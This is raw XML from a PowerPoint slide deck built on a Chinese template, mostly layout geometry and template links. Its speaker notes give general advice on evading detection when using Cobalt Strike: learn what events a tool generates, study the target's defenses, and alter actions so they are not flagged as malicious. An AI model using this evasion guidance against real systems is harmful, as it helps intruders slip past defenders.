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sldIdLst>
    <p:sldId id="261" r:id="rId4"/>
    <p:sldId id="410" r:id="rId6"/>
    <p:sldId id="422" r:id="rId7"/>
    <p:sldId id="460" r:id="rId8"/>
    <p:sldId id="461" r:id="rId9"/>
    <p:sldId id="462" r:id="rId10"/>
    <p:sldId id="463" r:id="rId11"/>
    <p:sldId id="464" r:id="rId12"/>
    <p:sldId id="465" r:id="rId13"/>
    <p:sldId id="466" r:id="rId14"/>
    <p:sldId id="469" r:id="rId15"/>
    <p:sldId id="470" r:id="rId16"/>
    <p:sldId id="471" r:id="rId17"/>
    <p:sldId id="485" r:id="rId18"/>
    <p:sldId id="487" r:id="rId19"/>
    <p:sldId id="486" r:id="rId20"/>
    <p:sldId id="472" r:id="rId21"/>
    <p:sldId id="474" r:id="rId22"/>
    <p:sldId id="475" r:id="rId23"/>
    <p:sldId id="473" r:id="rId24"/>
    <p:sldId id="479" r:id="rId25"/>
    <p:sldId id="480" r:id="rId26"/>
    <p:sldId id="481" r:id="rId27"/>
    <p:sldId id="482" r:id="rId28"/>
    <p:sldId id="484" r:id="rId29"/>
    <p:sldId id="488" r:id="rId30"/>
    <p:sldId id="489" r:id="rId31"/>
    <p:sldId id="490" r:id="rId32"/>
    <p:sldId id="491" r:id="rId33"/>
    <p:sldId id="492" r:id="rId34"/>
    <p:sldId id="493" r:id="rId35"/>
    <p:sldId id="494" r:id="rId36"/>
    <p:sldId id="495" r:id="rId37"/>
    <p:sldId id="496" r:id="rId38"/>
    <p:sldId id="459" r:id="rId39"/>
    <p:sldId id="497" r:id="rId4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92" autoAdjust="0"/>
    <p:restoredTop sz="92471" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="1056" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="708"/>
        <p:guide orient="horz" pos="2002"/>
        <p:guide pos="867"/>
        <p:guide pos="62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7DAC97F-DDBD-4432-91FA-91D0C011E91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09C8FB8-846E-4762-9887-08B1E29DBD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要想成功逃避 这是我的忠告</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标是帮助您理解那些选项是什么 我预期您将如何使用这些选项 并帮助您成功的钴打击产品一般</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>1st know your tools and their behaviors.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Your tools, cobalt strike or not, will generate events.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Some events are easily observable, some are not.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Next, assess and understand the defenses in your current target context.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同的防御产品观察不同的事件 并利用这些可观察事件的不同特征来判断是否存在恶意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第三 使用你对工具和它们的行为的了解 以及你对防御和当前目标上下文的了解 并决定哪个选项是有意义的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也许你可以选择在一开始就避免生成事件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者你可以改变你执行动作的一些特征这样你仍然能看到 你仍然被观察到 但你的动作不会被标记为恶意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从上述代码和输出结果可以看到，PropertyDescriptor实际上就是Java Bean的属性和对应get/set方法的集合。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C8FB8-846E-4762-9887-08B1E29DBD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251450" y="1035050"/>
            <a:ext cx="1689100" cy="15097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544006"/>
            <a:ext cx="9144000" cy="813556"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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A9820-21D4-44EC-88B5-B12CCA404E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89E0D-213D-4491-8C2B-AB8AD60BF3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使用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0" y="396875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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="858838"/>
            <a:ext cx="2373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90204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MORESHI POWERPOINT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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6BF63C-51F9-41A7-B835-5C127B811F0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altLang="zh-CN"/>
              <a:t>P</a:t>
            </a:r>
            <a:fld id="{A74AA12F-CC77-4A44-80F4-8E0AE8590DD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研究概述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0" y="396875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" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="858838"/>
            <a:ext cx="2373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90204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MORESHI POWERPOINT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0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0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6" y="1196182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3" y="10699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研究概述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3" y="18573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3" y="26463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3" y="34337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3" y="4222750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F49AD-E3D2-42C1-A151-504C3FAD9755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F236D5DC-F53F-4AE8-8C66-4269C5F9BD4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研究方法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0" y="396875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" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="858838"/>
            <a:ext cx="2373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90204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MORESHI POWERPOINT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0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0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6" y="1988345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3" y="10699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研究概述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3" y="18573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3" y="26463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3" y="34337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3" y="4222750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ACDBB-6BA3-49B9-897B-F9D7C37421EA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61CEA7D0-566D-4F1A-9DF5-00C51977F3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研究过程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0" y="396875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" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="858838"/>
            <a:ext cx="2373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90204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MORESHI POWERPOINT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0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0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6" y="2770982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3" y="10699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研究概述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3" y="18573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3" y="26463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3" y="34337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3" y="4222750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C87B4-D6CB-4950-ABA2-61A540F74860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BB84904B-C40B-4226-87F2-EDEC50268C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研究成果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0" y="396875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" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="858838"/>
            <a:ext cx="2373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90204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MORESHI POWERPOINT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0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0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6" y="3559970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3" y="10699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研究概述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3" y="18573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3" y="26463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3" y="34337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3" y="4222750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CF3E6-9679-4002-80AE-F092F2797CBF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89575C3D-097C-4334-AB27-3C4B93DE85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结论建议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0" y="396875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" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="858838"/>
            <a:ext cx="2373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90204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MORESHI POWERPOINT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0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0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6" y="4353720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3" y="10699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研究概述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3" y="1857375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3" y="26463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3" y="3433763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3" y="4222750"/>
            <a:ext cx="13874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C5620-B53C-4250-9CE2-1DBD0E6F48EB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D2DA9C13-9D11-4214-8A2A-3A389BBE2A9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内容版式_右下角通用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5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10987088" y="4545013"/>
            <a:ext cx="774700" cy="24606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模板下载：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www.1ppt.com/moban/     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行业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模板：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www.1ppt.com/hangye/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节日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模板：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www.1ppt.com/jieri/           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素材下载：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www.1ppt.com/sucai/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背景图片：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www.1ppt.com/beijing/      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图表下载：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www.1ppt.com/tubiao/    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优秀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www.1ppt.com/xiazai/        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教程： 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www.1ppt.com/powerpoint/    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Word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教程： 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www.1ppt.com/word/              Excel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教程：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www.1ppt.com/excel/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资料下载：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www.1ppt.com/ziliao/                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课件下载：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www.1ppt.com/kejian/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范文下载：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www.1ppt.com/fanwen/             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试卷下载：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www.1ppt.com/shiti/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教案下载：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www.1ppt.com/jiaoan/      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字体下载：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www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="100" kern="0" dirty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508000" y="396875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5" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="858838"/>
            <a:ext cx="2373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90204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MORESHI POWERPOINT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6" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617200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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11045825" y="5565775"/>
            <a:ext cx="715963" cy="846138"/>
            <a:chOff x="8367154" y="5203814"/>
            <a:chExt cx="1890395" cy="2232329"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 145"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8367154" y="5203814"/>
              <a:ext cx="1890395" cy="2232329"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 758 w 777"/>
                <a:gd name="T1" fmla="*/ 204 h 918"/>
                <a:gd name="T2" fmla="*/ 389 w 777"/>
                <a:gd name="T3" fmla="*/ 0 h 918"/>
                <a:gd name="T4" fmla="*/ 19 w 777"/>
                <a:gd name="T5" fmla="*/ 204 h 918"/>
                <a:gd name="T6" fmla="*/ 271 w 777"/>
                <a:gd name="T7" fmla="*/ 833 h 918"/>
                <a:gd name="T8" fmla="*/ 389 w 777"/>
                <a:gd name="T9" fmla="*/ 918 h 918"/>
                <a:gd name="T10" fmla="*/ 506 w 777"/>
                <a:gd name="T11" fmla="*/ 832 h 918"/>
                <a:gd name="T12" fmla="*/ 758 w 777"/>
                <a:gd name="T13" fmla="*/ 20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918">
                  <a:moveTo>
                    <a:pt x="758" y="204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4"/>
                    <a:pt x="0" y="622"/>
                    <a:pt x="271" y="833"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="306" y="864"/>
                    <a:pt x="344" y="893"/>
                    <a:pt x="389" y="918"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="893"/>
                    <a:pt x="472" y="864"/>
                    <a:pt x="506" y="832"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="622"/>
                    <a:pt x="758" y="204"/>
                    <a:pt x="758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46"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8530626" y="5337837"/>
              <a:ext cx="1563451" cy="1964282"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 322 w 643"/>
                <a:gd name="T1" fmla="*/ 807 h 807"/>
                <a:gd name="T2" fmla="*/ 317 w 643"/>
                <a:gd name="T3" fmla="*/ 804 h 807"/>
                <a:gd name="T4" fmla="*/ 237 w 643"/>
                <a:gd name="T5" fmla="*/ 742 h 807"/>
                <a:gd name="T6" fmla="*/ 234 w 643"/>
                <a:gd name="T7" fmla="*/ 739 h 807"/>
                <a:gd name="T8" fmla="*/ 0 w 643"/>
                <a:gd name="T9" fmla="*/ 183 h 807"/>
                <a:gd name="T10" fmla="*/ 0 w 643"/>
                <a:gd name="T11" fmla="*/ 178 h 807"/>
                <a:gd name="T12" fmla="*/ 322 w 643"/>
                <a:gd name="T13" fmla="*/ 0 h 807"/>
                <a:gd name="T14" fmla="*/ 643 w 643"/>
                <a:gd name="T15" fmla="*/ 178 h 807"/>
                <a:gd name="T16" fmla="*/ 643 w 643"/>
                <a:gd name="T17" fmla="*/ 183 h 807"/>
                <a:gd name="T18" fmla="*/ 409 w 643"/>
                <a:gd name="T19" fmla="*/ 739 h 807"/>
                <a:gd name="T20" fmla="*/ 406 w 643"/>
                <a:gd name="T21" fmla="*/ 742 h 807"/>
                <a:gd name="T22" fmla="*/ 326 w 643"/>
                <a:gd name="T23" fmla="*/ 804 h 807"/>
                <a:gd name="T24" fmla="*/ 322 w 643"/>
                <a:gd name="T25" fmla="*/ 807 h 807"/>
                <a:gd name="T26" fmla="*/ 18 w 643"/>
                <a:gd name="T27" fmla="*/ 187 h 807"/>
                <a:gd name="T28" fmla="*/ 244 w 643"/>
                <a:gd name="T29" fmla="*/ 726 h 807"/>
                <a:gd name="T30" fmla="*/ 248 w 643"/>
                <a:gd name="T31" fmla="*/ 729 h 807"/>
                <a:gd name="T32" fmla="*/ 322 w 643"/>
                <a:gd name="T33" fmla="*/ 787 h 807"/>
                <a:gd name="T34" fmla="*/ 395 w 643"/>
                <a:gd name="T35" fmla="*/ 729 h 807"/>
                <a:gd name="T36" fmla="*/ 399 w 643"/>
                <a:gd name="T37" fmla="*/ 726 h 807"/>
                <a:gd name="T38" fmla="*/ 625 w 643"/>
                <a:gd name="T39" fmla="*/ 187 h 807"/>
                <a:gd name="T40" fmla="*/ 322 w 643"/>
                <a:gd name="T41" fmla="*/ 19 h 807"/>
                <a:gd name="T42" fmla="*/ 18 w 643"/>
                <a:gd name="T43" fmla="*/ 18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3" h="807">
                  <a:moveTo>
                    <a:pt x="322" y="807"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="804"/>
                    <a:pt x="317" y="804"/>
                    <a:pt x="317" y="804"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="785"/>
                    <a:pt x="262" y="765"/>
                    <a:pt x="237" y="742"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="741"/>
                    <a:pt x="235" y="740"/>
                    <a:pt x="234" y="739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="578"/>
                    <a:pt x="3" y="273"/>
                    <a:pt x="0" y="18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643" y="178"/>
                    <a:pt x="643" y="178"/>
                    <a:pt x="643" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="643" y="183"/>
                    <a:pt x="643" y="183"/>
                    <a:pt x="643" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="640" y="273"/>
                    <a:pt x="617" y="578"/>
                    <a:pt x="409" y="739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="408" y="740"/>
                    <a:pt x="407" y="741"/>
                    <a:pt x="406" y="742"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382" y="764"/>
                    <a:pt x="355" y="785"/>
                    <a:pt x="326" y="804"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="322" y="807"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="18" y="187"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="281"/>
                    <a:pt x="46" y="572"/>
                    <a:pt x="244" y="726"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="727"/>
                    <a:pt x="247" y="728"/>
                    <a:pt x="248" y="729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271" y="750"/>
                    <a:pt x="296" y="769"/>
                    <a:pt x="322" y="787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="769"/>
                    <a:pt x="372" y="750"/>
                    <a:pt x="395" y="729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="728"/>
                    <a:pt x="397" y="727"/>
                    <a:pt x="399" y="726"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="597" y="572"/>
                    <a:pt x="623" y="281"/>
                    <a:pt x="625" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="19"/>
                    <a:pt x="322" y="19"/>
                    <a:pt x="322" y="19"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18" y="1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47"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8463561" y="5258262"/>
              <a:ext cx="1697581" cy="2123432"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 350 w 699"/>
                <a:gd name="T1" fmla="*/ 872 h 872"/>
                <a:gd name="T2" fmla="*/ 348 w 699"/>
                <a:gd name="T3" fmla="*/ 871 h 872"/>
                <a:gd name="T4" fmla="*/ 246 w 699"/>
                <a:gd name="T5" fmla="*/ 795 h 872"/>
                <a:gd name="T6" fmla="*/ 245 w 699"/>
                <a:gd name="T7" fmla="*/ 794 h 872"/>
                <a:gd name="T8" fmla="*/ 0 w 699"/>
                <a:gd name="T9" fmla="*/ 195 h 872"/>
                <a:gd name="T10" fmla="*/ 0 w 699"/>
                <a:gd name="T11" fmla="*/ 193 h 872"/>
                <a:gd name="T12" fmla="*/ 350 w 699"/>
                <a:gd name="T13" fmla="*/ 0 h 872"/>
                <a:gd name="T14" fmla="*/ 699 w 699"/>
                <a:gd name="T15" fmla="*/ 193 h 872"/>
                <a:gd name="T16" fmla="*/ 699 w 699"/>
                <a:gd name="T17" fmla="*/ 195 h 872"/>
                <a:gd name="T18" fmla="*/ 455 w 699"/>
                <a:gd name="T19" fmla="*/ 794 h 872"/>
                <a:gd name="T20" fmla="*/ 453 w 699"/>
                <a:gd name="T21" fmla="*/ 795 h 872"/>
                <a:gd name="T22" fmla="*/ 351 w 699"/>
                <a:gd name="T23" fmla="*/ 871 h 872"/>
                <a:gd name="T24" fmla="*/ 350 w 699"/>
                <a:gd name="T25" fmla="*/ 872 h 872"/>
                <a:gd name="T26" fmla="*/ 6 w 699"/>
                <a:gd name="T27" fmla="*/ 196 h 872"/>
                <a:gd name="T28" fmla="*/ 248 w 699"/>
                <a:gd name="T29" fmla="*/ 789 h 872"/>
                <a:gd name="T30" fmla="*/ 250 w 699"/>
                <a:gd name="T31" fmla="*/ 791 h 872"/>
                <a:gd name="T32" fmla="*/ 350 w 699"/>
                <a:gd name="T33" fmla="*/ 866 h 872"/>
                <a:gd name="T34" fmla="*/ 450 w 699"/>
                <a:gd name="T35" fmla="*/ 791 h 872"/>
                <a:gd name="T36" fmla="*/ 451 w 699"/>
                <a:gd name="T37" fmla="*/ 789 h 872"/>
                <a:gd name="T38" fmla="*/ 694 w 699"/>
                <a:gd name="T39" fmla="*/ 196 h 872"/>
                <a:gd name="T40" fmla="*/ 350 w 699"/>
                <a:gd name="T41" fmla="*/ 6 h 872"/>
                <a:gd name="T42" fmla="*/ 6 w 699"/>
                <a:gd name="T43" fmla="*/ 196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9" h="872">
                  <a:moveTo>
                    <a:pt x="350" y="872"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="871"/>
                    <a:pt x="348" y="871"/>
                    <a:pt x="348" y="871"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="849"/>
                    <a:pt x="277" y="823"/>
                    <a:pt x="246" y="795"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="795"/>
                    <a:pt x="245" y="794"/>
                    <a:pt x="245" y="794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="612"/>
                    <a:pt x="0" y="263"/>
                    <a:pt x="0" y="195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5"/>
                    <a:pt x="699" y="195"/>
                    <a:pt x="699" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="699" y="263"/>
                    <a:pt x="689" y="612"/>
                    <a:pt x="455" y="794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="794"/>
                    <a:pt x="454" y="794"/>
                    <a:pt x="453" y="795"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="422" y="823"/>
                    <a:pt x="388" y="849"/>
                    <a:pt x="351" y="871"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="350" y="872"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="268"/>
                    <a:pt x="18" y="611"/>
                    <a:pt x="248" y="789"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="790"/>
                    <a:pt x="249" y="790"/>
                    <a:pt x="250" y="791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="819"/>
                    <a:pt x="314" y="844"/>
                    <a:pt x="350" y="866"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385" y="844"/>
                    <a:pt x="419" y="819"/>
                    <a:pt x="450" y="791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="450" y="790"/>
                    <a:pt x="451" y="790"/>
                    <a:pt x="451" y="789"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="681" y="611"/>
                    <a:pt x="694" y="268"/>
                    <a:pt x="694" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="6"/>
                    <a:pt x="350" y="6"/>
                    <a:pt x="350" y="6"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6" y="1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261"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9016847" y="5798543"/>
              <a:ext cx="595202" cy="850212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 580 w 580"/>
                <a:gd name="T1" fmla="*/ 831 h 831"/>
                <a:gd name="T2" fmla="*/ 0 w 580"/>
                <a:gd name="T3" fmla="*/ 831 h 831"/>
                <a:gd name="T4" fmla="*/ 0 w 580"/>
                <a:gd name="T5" fmla="*/ 611 h 831"/>
                <a:gd name="T6" fmla="*/ 61 w 580"/>
                <a:gd name="T7" fmla="*/ 611 h 831"/>
                <a:gd name="T8" fmla="*/ 61 w 580"/>
                <a:gd name="T9" fmla="*/ 220 h 831"/>
                <a:gd name="T10" fmla="*/ 0 w 580"/>
                <a:gd name="T11" fmla="*/ 220 h 831"/>
                <a:gd name="T12" fmla="*/ 0 w 580"/>
                <a:gd name="T13" fmla="*/ 0 h 831"/>
                <a:gd name="T14" fmla="*/ 367 w 580"/>
                <a:gd name="T15" fmla="*/ 0 h 831"/>
                <a:gd name="T16" fmla="*/ 367 w 580"/>
                <a:gd name="T17" fmla="*/ 220 h 831"/>
                <a:gd name="T18" fmla="*/ 289 w 580"/>
                <a:gd name="T19" fmla="*/ 220 h 831"/>
                <a:gd name="T20" fmla="*/ 289 w 580"/>
                <a:gd name="T21" fmla="*/ 611 h 831"/>
                <a:gd name="T22" fmla="*/ 360 w 580"/>
                <a:gd name="T23" fmla="*/ 611 h 831"/>
                <a:gd name="T24" fmla="*/ 360 w 580"/>
                <a:gd name="T25" fmla="*/ 516 h 831"/>
                <a:gd name="T26" fmla="*/ 580 w 580"/>
                <a:gd name="T27" fmla="*/ 516 h 831"/>
                <a:gd name="T28" fmla="*/ 580 w 580"/>
                <a:gd name="T29" fmla="*/ 831 h 831"/>
                <a:gd name="T30" fmla="*/ 568 w 580"/>
                <a:gd name="T31" fmla="*/ 817 h 831"/>
                <a:gd name="T32" fmla="*/ 568 w 580"/>
                <a:gd name="T33" fmla="*/ 528 h 831"/>
                <a:gd name="T34" fmla="*/ 372 w 580"/>
                <a:gd name="T35" fmla="*/ 528 h 831"/>
                <a:gd name="T36" fmla="*/ 372 w 580"/>
                <a:gd name="T37" fmla="*/ 623 h 831"/>
                <a:gd name="T38" fmla="*/ 277 w 580"/>
                <a:gd name="T39" fmla="*/ 623 h 831"/>
                <a:gd name="T40" fmla="*/ 277 w 580"/>
                <a:gd name="T41" fmla="*/ 208 h 831"/>
                <a:gd name="T42" fmla="*/ 357 w 580"/>
                <a:gd name="T43" fmla="*/ 208 h 831"/>
                <a:gd name="T44" fmla="*/ 357 w 580"/>
                <a:gd name="T45" fmla="*/ 14 h 831"/>
                <a:gd name="T46" fmla="*/ 12 w 580"/>
                <a:gd name="T47" fmla="*/ 14 h 831"/>
                <a:gd name="T48" fmla="*/ 12 w 580"/>
                <a:gd name="T49" fmla="*/ 208 h 831"/>
                <a:gd name="T50" fmla="*/ 75 w 580"/>
                <a:gd name="T51" fmla="*/ 208 h 831"/>
                <a:gd name="T52" fmla="*/ 75 w 580"/>
                <a:gd name="T53" fmla="*/ 623 h 831"/>
                <a:gd name="T54" fmla="*/ 12 w 580"/>
                <a:gd name="T55" fmla="*/ 623 h 831"/>
                <a:gd name="T56" fmla="*/ 12 w 580"/>
                <a:gd name="T57" fmla="*/ 817 h 831"/>
                <a:gd name="T58" fmla="*/ 568 w 580"/>
                <a:gd name="T59" fmla="*/ 817 h 831"/>
                <a:gd name="T60" fmla="*/ 530 w 580"/>
                <a:gd name="T61" fmla="*/ 779 h 831"/>
                <a:gd name="T62" fmla="*/ 52 w 580"/>
                <a:gd name="T63" fmla="*/ 779 h 831"/>
                <a:gd name="T64" fmla="*/ 52 w 580"/>
                <a:gd name="T65" fmla="*/ 663 h 831"/>
                <a:gd name="T66" fmla="*/ 113 w 580"/>
                <a:gd name="T67" fmla="*/ 663 h 831"/>
                <a:gd name="T68" fmla="*/ 113 w 580"/>
                <a:gd name="T69" fmla="*/ 168 h 831"/>
                <a:gd name="T70" fmla="*/ 52 w 580"/>
                <a:gd name="T71" fmla="*/ 168 h 831"/>
                <a:gd name="T72" fmla="*/ 52 w 580"/>
                <a:gd name="T73" fmla="*/ 52 h 831"/>
                <a:gd name="T74" fmla="*/ 317 w 580"/>
                <a:gd name="T75" fmla="*/ 52 h 831"/>
                <a:gd name="T76" fmla="*/ 317 w 580"/>
                <a:gd name="T77" fmla="*/ 168 h 831"/>
                <a:gd name="T78" fmla="*/ 237 w 580"/>
                <a:gd name="T79" fmla="*/ 168 h 831"/>
                <a:gd name="T80" fmla="*/ 237 w 580"/>
                <a:gd name="T81" fmla="*/ 663 h 831"/>
                <a:gd name="T82" fmla="*/ 410 w 580"/>
                <a:gd name="T83" fmla="*/ 663 h 831"/>
                <a:gd name="T84" fmla="*/ 410 w 580"/>
                <a:gd name="T85" fmla="*/ 566 h 831"/>
                <a:gd name="T86" fmla="*/ 530 w 580"/>
                <a:gd name="T87" fmla="*/ 566 h 831"/>
                <a:gd name="T88" fmla="*/ 530 w 580"/>
                <a:gd name="T89" fmla="*/ 779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0" h="831">
                  <a:moveTo>
                    <a:pt x="580" y="831"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="22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220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360" y="611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360" y="516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580" y="516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580" y="831"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="568" y="817"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="568" y="528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372" y="528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372" y="623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
